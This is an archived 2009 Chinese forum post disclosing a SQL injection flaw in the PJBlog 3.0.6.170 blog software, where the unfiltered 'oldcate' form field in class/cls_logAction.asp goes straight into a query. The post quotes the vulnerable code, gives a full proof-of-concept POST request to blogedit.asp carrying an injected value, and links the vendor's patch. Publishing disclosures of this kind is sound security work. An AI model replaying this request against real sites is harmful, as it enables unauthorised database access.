秋枫清 發表於 2009-5-24 18:12:50

PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞

<div style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"><font style="FONT-SIZE: 14px; FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif"><font face="新宋体">影响版本:PJBlog 3.0.6.170<br />程序介绍:<br />PJBlog一套开源免费的中文个人博客系统程序,采用asp+Access的技术,具有相当高的运作效能以及更新率,也支持目前Blog所使用的新技术。<br /><br /><br />漏洞分析:<br />在文件class/cls_logAction.asp中:<br /><br />oldcate=request.form(&quot;oldcate&quot;) //第429行<br />oldctype=request.form(&quot;oldtype&quot;)<br /><br />D = conn.execute(&quot;select cate_Part from blog_Category where cate_ID=&quot;&amp;oldcate)(0)程序没有对变量oldcate做任何过滤放入sql查询语句中,导致注入漏洞的产生。<br /><br />漏洞利用:<br /><br />POST /blogedit.asp HTTP/1.1<br />Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*<br />Referer: <font color="#ff0000" size="2">http://127.0.0.1/blogedit.asp?id=1</font><br />Accept-Language: zh-cn<br />Content-Type: application/x-www-form-urlencoded<br />UA-CPU: x86<br />Accept-Encoding: gzip, deflate<br />User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)<br />Host: 127.0.0.1<br />Content-Length: 513<br />Connection: Keep-Alive<br />Cache-Control: no-cache<br />Cookie: __utma=96992031.4542583209449947600.1239335726.1240296350.1240324232.7; __utmz=96992031.1239335726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PJBlog3Setting=ViewType=normal; PJBlog3=memRight=111111111111&amp;memHashKey=c80f369e20b317566f736dbc70839834745d9c20&amp;memName=<br /><br />admin&amp;exp=2010%2D4%2D21; ASPSESSIONIDCCDSDABA=OEBBHCODJFKIJEGKGCPHGMCP<br /><br />id=1&amp;log_editType=1&amp;action=post&amp;log_IsDraft=False&amp;title=xxx&amp;log_CateID=3&amp;cname=xxx&amp;ctype=0&amp;oldcname=<br /><br />xxx&amp;oldtype=0&amp;oldcate=3201=1&amp;log_weather=sunny&amp;log_Level=level3&amp;log_comorder=1&amp;blog_pws=<br /><br />0&amp;log_Readpw=&amp;log_Pwtips=&amp;c_pws=0&amp;blog_Meta=0&amp;evio_KeyWords=xxx&amp;evio_Description=<br /><br />web+safe&amp;log_From=%E6%9C%AC%E7%AB%99%E5%8E%9F%E5%88%9B&amp;log_FromURL=http%3A%2F%2Flocalhost%2Fbackci%2F&amp;PubTimeType=com&amp;PubTime=2009-4-21+15%3A54%3A46&amp;tags=&amp;UBBfonts=&amp;UBBfonts=&amp;UBBfonts=&amp;UBBmethod=on&amp;Message=web+safe&amp;log_Intro=<br /><br />web+safe&amp;log_Quote=解决方案:<br />厂商补丁:<br />PJblog<br />-------<br />目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:<br /><font color="#ff0000" size="2">http://bbs.pjhome.net/thread-52214-1-1.html</font></font></font></div>
頁: [1]
查看完整版本: PJBlog个人博客系统cls_logAction.asp文件存在注入漏洞